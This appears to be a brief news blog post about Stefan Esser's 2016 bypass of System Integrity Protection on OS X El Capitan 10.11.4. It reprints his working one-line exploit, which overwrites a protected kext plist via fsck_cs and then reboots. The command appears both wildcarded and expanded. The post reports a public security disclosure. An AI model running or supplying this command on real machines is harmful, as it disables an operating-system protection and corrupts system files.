It may be disappointing to many Apple users that Apple delivered an ineffective security patch in its latest update of OS X El Captain 10.11.4.
This exploit could affect potentially 100 million users.
Apple has introduced SIP (System Integrity Protection) with its latest OS. It restricts user to do root changes. It also helps in not tweaking with protected parts of system.
Now this code –
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
Which expands to –
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
Which was reveled by a German security researcher, Stefan Esser. Using this User can bypass SIP.
Disable AppleKextExcludeList to pwn SIP on 10.11.4: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
— Stefan Esser (@i0n1c) March 28, 2016
This was an unexpected from Apple. We hope to treat its users with a better patch next time!